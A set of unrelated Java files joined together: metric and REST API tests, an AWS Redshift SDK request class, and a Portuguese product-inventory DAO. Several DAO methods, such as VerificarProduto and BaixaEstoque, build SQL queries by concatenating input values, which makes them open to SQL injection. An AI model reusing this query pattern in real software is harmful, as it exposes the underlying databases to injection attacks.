session.evaluate(1f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(0f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{1, 1, 0.9f, 1, 1}});
labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
}
}
@Test
public void testUnweightedTopKAndThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, 0.7f, 2, null, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.8f, 0.6f, 0f, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{1, 1, 1, 0, 1}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.25f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(3f, instance.getFalseNegatives());
}
}
@Test
public void testEagerEnvironment() {
try (TestSession session = TestSession.createTestSession(TestSession.Mode.EAGER)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, 0.7f, 2, null, 1001L, TFloat32.class);
assertThrows(IllegalArgumentException.class, () -> instance.updateState(tf, null, null));
}
}
}
|
|
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.redshift.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.AmazonWebServiceRequest;
/**
* <p/>
*
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/ResetClusterParameterGroup"
* target="_top">AWS API Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class ResetClusterParameterGroupRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable {
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*/
private String parameterGroupName;
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*/
private Boolean resetAllParameters;
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*/
private com.amazonaws.internal.SdkInternalList<Parameter> parameters;
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @param parameterGroupName
* The name of the cluster parameter group to be reset.
*/
public void setParameterGroupName(String parameterGroupName) {
this.parameterGroupName = parameterGroupName;
}
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @return The name of the cluster parameter group to be reset.
*/
public String getParameterGroupName() {
return this.parameterGroupName;
}
/**
* <p>
* The name of the cluster parameter group to be reset.
* </p>
*
* @param parameterGroupName
* The name of the cluster parameter group to be reset.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameterGroupName(String parameterGroupName) {
setParameterGroupName(parameterGroupName);
return this;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @param resetAllParameters
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public void setResetAllParameters(Boolean resetAllParameters) {
this.resetAllParameters = resetAllParameters;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @return If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public Boolean getResetAllParameters() {
return this.resetAllParameters;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @param resetAllParameters
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withResetAllParameters(Boolean resetAllParameters) {
setResetAllParameters(resetAllParameters);
return this;
}
/**
* <p>
* If <code>true</code>, all parameters in the specified parameter group will be reset to their default values.
* </p>
* <p>
* Default: <code>true</code>
* </p>
*
* @return If <code>true</code>, all parameters in the specified parameter group will be reset to their default
* values. </p>
* <p>
* Default: <code>true</code>
*/
public Boolean isResetAllParameters() {
return this.resetAllParameters;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @return An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
*/
public java.util.List<Parameter> getParameters() {
if (parameters == null) {
parameters = new com.amazonaws.internal.SdkInternalList<Parameter>();
}
return parameters;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
*/
public void setParameters(java.util.Collection<Parameter> parameters) {
if (parameters == null) {
this.parameters = null;
return;
}
this.parameters = new com.amazonaws.internal.SdkInternalList<Parameter>(parameters);
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
* <p>
* <b>NOTE:</b> This method appends the values to the existing list (if any). Use
* {@link #setParameters(java.util.Collection)} or {@link #withParameters(java.util.Collection)} if you want to
* override the existing values.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameters(Parameter... parameters) {
if (this.parameters == null) {
setParameters(new com.amazonaws.internal.SdkInternalList<Parameter>(parameters.length));
}
for (Parameter ele : parameters) {
this.parameters.add(ele);
}
return this;
}
/**
* <p>
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at least one
* parameter name must be supplied.
* </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* </p>
*
* @param parameters
* An array of names of parameters to be reset. If <i>ResetAllParameters</i> option is not used, then at
* least one parameter name must be supplied. </p>
* <p>
* Constraints: A maximum of 20 parameters can be reset in a single request.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public ResetClusterParameterGroupRequest withParameters(java.util.Collection<Parameter> parameters) {
setParameters(parameters);
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getParameterGroupName() != null)
sb.append("ParameterGroupName: ").append(getParameterGroupName()).append(",");
if (getResetAllParameters() != null)
sb.append("ResetAllParameters: ").append(getResetAllParameters()).append(",");
if (getParameters() != null)
sb.append("Parameters: ").append(getParameters());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof ResetClusterParameterGroupRequest == false)
return false;
ResetClusterParameterGroupRequest other = (ResetClusterParameterGroupRequest) obj;
if (other.getParameterGroupName() == null ^ this.getParameterGroupName() == null)
return false;
if (other.getParameterGroupName() != null && other.getParameterGroupName().equals(this.getParameterGroupName()) == false)
return false;
if (other.getResetAllParameters() == null ^ this.getResetAllParameters() == null)
return false;
if (other.getResetAllParameters() != null && other.getResetAllParameters().equals(this.getResetAllParameters()) == false)
return false;
if (other.getParameters() == null ^ this.getParameters() == null)
return false;
if (other.getParameters() != null && other.getParameters().equals(this.getParameters()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getParameterGroupName() == null) ? 0 : getParameterGroupName().hashCode());
hashCode = prime * hashCode + ((getResetAllParameters() == null) ? 0 : getResetAllParameters().hashCode());
hashCode = prime * hashCode + ((getParameters() == null) ? 0 : getParameters().hashCode());
return hashCode;
}
@Override
public ResetClusterParameterGroupRequest clone() {
return (ResetClusterParameterGroupRequest) super.clone();
}
}
|
|
package funcoes;
import atributos.Produto;
import java.sql.CallableStatement;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.logging.Level;
import java.util.logging.Logger;
/**
*
* @author graciele
*/
public class ProdutoDAO {
private static int codDetProduto;
public static int Cadroduto(Produto prod){
int id = 0;
PreparedStatement stmt;
try {
String sql = ("INSERT INTO tabproduto(tabusuario_id_usuario, "
+ " produto) " +
" VALUES(?,?);");
stmt = Conexao.getConnection().prepareStatement(sql);
stmt.setInt(1, prod.getIdUsuario());
stmt.setString(2, prod.getProduto());
stmt.executeUpdate();
ResultSet rs = stmt.getGeneratedKeys();
if (rs.next()) {
id = rs.getInt(1);
}
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Cadastrar Produto: ",ex);
}
return id;
}
public static int CadDetProduto(Produto prod){
PreparedStatement stmt;
int id = 0;
try {
String sql = ("INSERT INTO tabdetproduto(tabproduto_id_prod, " +
" quantidade, " +
" precoEntrada, " +
" precoSaida, " +
" quantidadeMinima, " +
" tabModelo_idtabModelo, " +
" dataCadastro, " +
" tabFabricante_idtabFabricante) " +
" VALUES(?,?,?,?,?,?,?,?);");
stmt = Conexao.getConnection().prepareStatement(sql);
stmt.setInt(1, prod.getCodProduto());
stmt.setInt(2, prod.getQuantidade());
stmt.setDouble(3 , prod.getPrecoEntrada());
stmt.setDouble(4, prod.getPrecoSaida());
stmt.setInt(5, prod.getQuantidadeMinima());
stmt.setInt(6, prod.getCodModelo());
stmt.setObject(7, prod.getDataCadProduto());
stmt.setInt(8, prod.getCodFabricante());
stmt.executeUpdate();
ResultSet rs = stmt.getGeneratedKeys();
if (rs.next()) {
id = rs.getInt(1);
}
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Cadastrar detalhe do Produto: ",ex);
}
return id;
}
public static ArrayList CarregaProduto(int id) {
Statement stmt;
ArrayList<Produto> produto = new ArrayList<Produto>();
try {
String Sql = "SELECT * FROM tabproduto "
+ " INNER JOIN tabdetproduto ON "
+ " tabproduto_id_prod = id_prod "
+ " WHERE id_prod = " + id + ";";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
Produto p = new Produto();
p.setIdProduto(rs.getInt("id_prod"));
p.setIdUsuario(rs.getInt("tabusuario_id_usuario"));
p.setProduto(rs.getString("produto"));
p.setCodProduto(rs.getInt("tabproduto_id_prod"));
p.setIdDetProduto(rs.getInt("idDetProduto"));
p.setQuantidade(rs.getInt("quantidade"));
p.setPrecoEntrada(rs.getDouble("precoEntrada"));
p.setPrecoSaida(rs.getDouble("precoSaida"));
p.setQuantidadeMinima(rs.getInt("quantidadeMinima"));
p.setCodModelo(rs.getInt("tabModelo_idtabModelo"));
p.setDataCadProduto(rs.getDate("dataCadastro"));
p.setCodFabricante(rs.getInt("tabFabricante_idtabFabricante"));
p.setIdProduto(id);
produto.add(p);
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao carregar os dados do Produto: ", ex);
}
return produto;
}
public static int idProduto(int id) {
Statement stmt;
Produto p = new Produto();
try {
String Sql = "SELECT id_prod FROM tabproduto WHERE id_prod = '"+ id +"';";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
p.setIdProduto(rs.getInt("id_prod"));
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao pegar id do Produto: ", ex);
}
return p.getIdProduto();
}
public static void ExcluirProduto(int id){
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call ExcluirProduto(?)}");
stmt.setInt(1, id);
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao excluir os dados do Produto: ",ex);
}
}
public static void UpdateProduto(Produto prod, int id){
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call UpdateProduto(?,?,?,?,?,?,?)}");
stmt.setInt(1, id);
stmt.setString(2, prod.getProduto());
stmt.setInt(3, prod.getQuantidade());
stmt.setDouble(4 , prod.getPrecoEntrada());
stmt.setDouble(5, prod.getPrecoSaida());
stmt.setInt(6, prod.getCodModelo());
stmt.setInt(7, prod.getCodFabricante());
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao excluir os dados do Produto: ",ex);
}
}
public static void AlterarEstoque(Produto prod, int id) {
CallableStatement stmt;
try {
stmt = Conexao.getConnection().prepareCall("{call AdicionaEstoque(?,?,?,?,?)}");
stmt.setInt(1, id);
stmt.setInt(2, prod.getQuantidade());
stmt.setDouble(3 , prod.getPrecoEntrada());
stmt.setDouble(4, prod.getPrecoSaida());
stmt.setObject(5, prod.getDataCadProduto());
stmt.execute();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao adicionar produto no estoque: ",ex);
}
}
public static void BaixaEstoque(int quant, int id) {
PreparedStatement stmt;
try {
String sql = ("UPDATE tabdetproduto SET quantidade = '" + quant
+ "' where idDetProduto = '" + id + "';");
stmt = Conexao.getConnection().prepareStatement(sql);
stmt.executeUpdate();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao dar baixa no estoque: ", ex);
}
}
public static ArrayList<Produto> ListarProdutos(){
Statement stmt;
ArrayList<Produto> produto = new ArrayList<Produto>();
try {
String Sql = "SELECT produto FROM tabproduto ;";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()){
Produto p = new Produto();
p.setProduto(rs.getString("produto"));
produto.add(p);
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ProdutoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao carregar os dados do Produto: ", ex);
}
return produto;
}
public static int codDetProduto() {
return codDetProduto;
}
public static double ExisteProduto(int idProduto, int idModelo, int idFabricante) {
Statement stmt;
double valor = 0;
try {
String Sql = "SELECT * FROM vw_combofabricanteproduto "
+ " WHERE id_prod = " + idProduto
+ " AND tabmodelo_idtabModelo = " + idModelo
+ " AND idtabFabricante = " + idFabricante +";";
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
while(rs.next()) {
valor = rs.getDouble("precoSaida");
codDetProduto = rs.getInt("idDetProduto");
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ServicoDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Carregar os dados do servico: ",ex);
}
return valor;
}
public static boolean VerificarProduto(String cliente) {
Statement stmt;
boolean achou = true;
int cli = 0;
//"SELECT * FROM tabcliente WHERE empresa IN (SELECT E.equipamento FROM tabequipamento E GROUP BY E.equipamento HAVING COUNT(*) > 1) ORDER BY equipamento";
String Sql = "SELECT COUNT(0), empresa, cnpj FROM tabcliente WHERE cnpj = '" + cliente + "';";
try {
ResultSet rs;
stmt = Conexao.getConnection().createStatement();
rs = stmt.executeQuery(Sql);
rs.first();
do {
cli = rs.getInt("COUNT(0)");
} while (rs.next());
if (cli == 0) {
achou = false;
}
rs.close();
stmt.close();
} catch (SQLException ex) {
Logger.getLogger(ClienteDAO.class.getName()).log(Level.SEVERE, null, ex);
throw new RuntimeException("Erro ao Carregar os dados do cliente: ", ex);
}
return achou;
}
}
|
|
package io.smsc.repository.admin;
import io.smsc.model.admin.User;
import io.smsc.AbstractSpringMVCTest;
import io.smsc.model.customer.Salutation;
import org.junit.Test;
import org.springframework.restdocs.payload.FieldDescriptor;
import org.springframework.security.test.context.support.WithMockUser;
import java.util.Date;
import static org.hamcrest.Matchers.*;
import static org.springframework.restdocs.mockmvc.MockMvcRestDocumentation.document;
import static org.springframework.restdocs.operation.preprocess.Preprocessors.*;
import static org.springframework.restdocs.snippet.Attributes.key;
import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestPostProcessors.csrf;
import static org.springframework.restdocs.payload.PayloadDocumentation.*;
import static org.springframework.restdocs.mockmvc.RestDocumentationRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;
import static org.springframework.restdocs.request.RequestDocumentation.*;
@WithMockUser(username = "admin", roles = {"POWER_ADMIN_USER"})
public class UserRestTest extends AbstractSpringMVCTest {
@Test
public void testGetSingleAdminUser() throws Exception {
mockMvc.perform(get("/rest/repository/users/{id}", 1))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("user")))
.andExpect(jsonPath("$.firstname", is("userName")))
.andExpect(jsonPath("$.surname", is("userSurname")))
.andExpect(jsonPath("$.email", is("[email protected]")))
.andExpect(jsonPath("$.active", is(true)))
.andExpect(jsonPath("$.blocked", is(false)))
.andExpect(jsonPath("$.salutation", is(Salutation.MR.toString())))
.andDo(document("getAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
responseFields(adminUserFieldsForResponse(false))));
}
@Test
public void testAdminUserNotFound() throws Exception {
mockMvc.perform(get("/rest/repository/users/999")
.contentType("application/json;charset=UTF-8"))
.andExpect(status().isNotFound());
}
@Test
public void testGetAllAdminUsers() throws Exception {
mockMvc.perform(get("/rest/repository/users?page=0&size=5"))
.andExpect(status().isOk())
.andExpect(jsonPath("$._embedded.users", hasSize(3)))
.andExpect(jsonPath("$._embedded.users[0].username", is("user")))
.andExpect(jsonPath("$._embedded.users[0].firstname", is("userName")))
.andExpect(jsonPath("$._embedded.users[0].surname", is("userSurname")))
.andExpect(jsonPath("$._embedded.users[0].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[0].active", is(true)))
.andExpect(jsonPath("$._embedded.users[0].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[0].salutation", is(Salutation.MR.toString())))
.andExpect(jsonPath("$._embedded.users[1].username", is("demo")))
.andExpect(jsonPath("$._embedded.users[1].firstname", is("demoName")))
.andExpect(jsonPath("$._embedded.users[1].surname", is("demoSurname")))
.andExpect(jsonPath("$._embedded.users[1].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[1].active", is(true)))
.andExpect(jsonPath("$._embedded.users[1].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[1].salutation", is(Salutation.MR.toString())))
.andExpect(jsonPath("$._embedded.users[2].username", is("admin")))
.andExpect(jsonPath("$._embedded.users[2].firstname", is("adminName")))
.andExpect(jsonPath("$._embedded.users[2].surname", is("adminSurname")))
.andExpect(jsonPath("$._embedded.users[2].email", is("[email protected]")))
.andExpect(jsonPath("$._embedded.users[2].active", is(true)))
.andExpect(jsonPath("$._embedded.users[2].blocked", is(false)))
.andExpect(jsonPath("$._embedded.users[2].salutation", is(Salutation.MRS.toString())))
.andDo(document("getAdminUsers",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
requestParameters(
parameterWithName("page").description("Page of results"),
parameterWithName("size").description("Size of results")),
responseFields(adminUserFieldsForResponse(true))));
}
@Test
public void testCreateAdminUser() throws Exception {
User user = new User();
user.setUsername("Old Johnny");
user.setFirstname("John");
user.setSurname("Forrester");
user.setEmail("[email protected]");
user.setActive(true);
user.setBlocked(false);
user.setSalutation(Salutation.MR);
String userJson = json(user);
// json is ignoring password
userJson = userJson.substring(0, userJson.length() - 1).concat(", \"password\" : \"john123456\" \r\n }");
this.mockMvc.perform(post("/rest/repository/users")
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content(userJson))
.andExpect(status().isCreated())
.andDo(document("createAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
requestFields(adminUserFieldsForRequest(false)),
responseFields(adminUserFieldsForResponse(false))));
}
@Test
public void testDeleteAdminUser() throws Exception {
mockMvc.perform(delete("/rest/repository/users/{id}", 1)
.with(csrf()))
.andDo(document("deleteAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser"))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isNotFound());
}
@Test
public void testUpdateAdminUser() throws Exception {
mockMvc.perform(patch("/rest/repository/users/{id}", 1)
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content("{ \"username\" : \"Old Johnny\" }"))
.andExpect(status().isOk())
.andDo(document("updateAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
requestFields(adminUserFieldsForRequest(true)),
responseFields(adminUserFieldsForResponse(false))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("Old Johnny")));
}
@Test
public void testReplaceAdminUser() throws Exception {
User user = new User();
user.setId(1L);
user.setUsername("Old Johnny");
user.setFirstname("John");
user.setSurname("Forrester");
user.setEmail("[email protected]");
user.setActive(false);
user.setBlocked(true);
user.setSalutation(Salutation.MR);
String userJson = json(user);
// json is ignoring password
userJson = userJson.substring(0, userJson.length() - 1).concat(", \"password\" : \"john123456\" \r\n }");
mockMvc.perform(put("/rest/repository/users/{id}", 1)
.with(csrf())
.contentType("application/json;charset=UTF-8")
.content(userJson))
.andExpect(status().isOk())
.andDo(document("replaceAdminUser",
preprocessRequest(prettyPrint()),
preprocessResponse(prettyPrint()),
pathParameters(getPathParam("AdminUser")),
requestFields(adminUserFieldsForRequest(false)),
responseFields(adminUserFieldsForResponse(false))));
mockMvc.perform(get("/rest/repository/users/1"))
.andExpect(status().isOk())
.andExpect(jsonPath("$.username", is("Old Johnny")))
.andExpect(jsonPath("$.firstname", is("John")))
.andExpect(jsonPath("$.surname", is("Forrester")))
.andExpect(jsonPath("$.email", is("[email protected]")))
.andExpect(jsonPath("$.active", is(false)))
.andExpect(jsonPath("$.blocked", is(true)));
}
/**
* AdminUser fields used in responses.
* An array field equivalent can be provided
*
* @param isJsonArray if the fields are used in a JsonArray
* @return FieldDescriptor
*/
private FieldDescriptor[] adminUserFieldsForResponse(boolean isJsonArray) {
return isJsonArray ?
new FieldDescriptor[]{
fieldWithPath("_embedded.users[]").description("AdminUsers list"),
fieldWithPath("_embedded.users[].id").description("AdminUser's id"),
fieldWithPath("_embedded.users[].salutation").type(Salutation.class)
.description("AdminUser's salutation"),
fieldWithPath("_embedded.users[].username").description("AdminUser's username"),
fieldWithPath("_embedded.users[].firstname").description("AdminUser's firstname"),
fieldWithPath("_embedded.users[].surname").description("AdminUser's surname"),
fieldWithPath("_embedded.users[].email").description("AdminUser's email"),
fieldWithPath("_embedded.users[].active").description("AdminUser's active"),
fieldWithPath("_embedded.users[].created").description("AdminUser's created"),
fieldWithPath("_embedded.users[].blocked").description("AdminUser's blocked"),
fieldWithPath("_embedded.users[].lastModifiedDate").type(Date.class)
.description("AdminUser's date of last modification"),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
} :
new FieldDescriptor[]{
fieldWithPath("id").description("AdminUser's id"),
fieldWithPath("salutation").type(Salutation.class).description("AdminUser's salutation"),
fieldWithPath("username").description("AdminUser's username"),
fieldWithPath("firstname").description("AdminUser's firstname"),
fieldWithPath("surname").description("AdminUser's surname"),
fieldWithPath("email").description("AdminUser's email"),
fieldWithPath("active").description("AdminUser's active"),
fieldWithPath("created").description("AdminUser's created"),
fieldWithPath("blocked").description("AdminUser's blocked"),
fieldWithPath("lastModifiedDate").type(Date.class).type(Date.class)
.description("AdminUser's date of last modification"),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
};
}
/**
* AdminUser fields used in requests.
*
* @return FieldDescriptor
*/
private FieldDescriptor[] adminUserFieldsForRequest(boolean isPatchRequest) {
return isPatchRequest ?
new FieldDescriptor[]{
fieldWithPath("salutation").optional().type(Salutation.class).description("AdminUser's salutation")
.attributes(key("mandatory").value(false)),
fieldWithPath("username").optional().type(String.class).description("AdminUser's username")
.attributes(key("mandatory").value(false)),
fieldWithPath("password").optional().type(String.class).description("AdminUser's password")
.attributes(key("mandatory").value(false)),
fieldWithPath("firstname").optional().type(String.class).description("AdminUser's firstname")
.attributes(key("mandatory").value(false)),
fieldWithPath("surname").optional().type(String.class).description("AdminUser's surname")
.attributes(key("mandatory").value(false)),
fieldWithPath("email").optional().type(String.class).description("AdminUser's email")
.attributes(key("mandatory").value(false)),
fieldWithPath("active").optional().type(Boolean.class).description("AdminUser's active")
.attributes(key("mandatory").value(false)),
fieldWithPath("blocked").optional().type(Boolean.class).description("AdminUser's blocked")
.attributes(key("mandatory").value(false)),
fieldWithPath("created").optional().ignored(),
fieldWithPath("id").optional().ignored(),
fieldWithPath("lastModifiedDate").optional().ignored(),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
} :
new FieldDescriptor[]{
fieldWithPath("salutation").type(Salutation.class).description("AdminUser's salutation")
.attributes(key("mandatory").value(true)),
fieldWithPath("username").type(String.class).description("AdminUser's username")
.attributes(key("mandatory").value(true)),
fieldWithPath("password").type(String.class).description("AdminUser's password")
.attributes(key("mandatory").value(true)),
fieldWithPath("firstname").type(String.class).description("AdminUser's firstname")
.attributes(key("mandatory").value(true)),
fieldWithPath("surname").type(String.class).description("AdminUser's surname")
.attributes(key("mandatory").value(true)),
fieldWithPath("email").type(String.class).description("AdminUser's email")
.attributes(key("mandatory").value(true)),
fieldWithPath("active").type(Boolean.class).description("AdminUser's active")
.attributes(key("mandatory").value(true)),
fieldWithPath("blocked").type(Boolean.class).description("AdminUser's blocked")
.attributes(key("mandatory").value(true)),
fieldWithPath("created").optional().ignored(),
fieldWithPath("id").optional().ignored(),
fieldWithPath("lastModifiedDate").optional().ignored(),
fieldWithPath("_links").optional().ignored(),
fieldWithPath("page").optional().ignored()
};
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hbase.replication.regionserver;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
import java.security.SecureRandom;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.Set;
import java.util.concurrent.atomic.AtomicBoolean;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hbase.Cell;
import org.apache.hadoop.hbase.CellUtil;
import org.apache.hadoop.hbase.HBaseClassTestRule;
import org.apache.hadoop.hbase.HBaseTestingUtility;
import org.apache.hadoop.hbase.HConstants;
import org.apache.hadoop.hbase.HRegionInfo;
import org.apache.hadoop.hbase.KeyValue;
import org.apache.hadoop.hbase.Stoppable;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.TableNotFoundException;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.RegionLocator;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.ResultScanner;
import org.apache.hadoop.hbase.client.RetriesExhaustedWithDetailsException;
import org.apache.hadoop.hbase.client.Scan;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.testclassification.MediumTests;
import org.apache.hadoop.hbase.testclassification.ReplicationTests;
import org.apache.hadoop.hbase.util.Bytes;
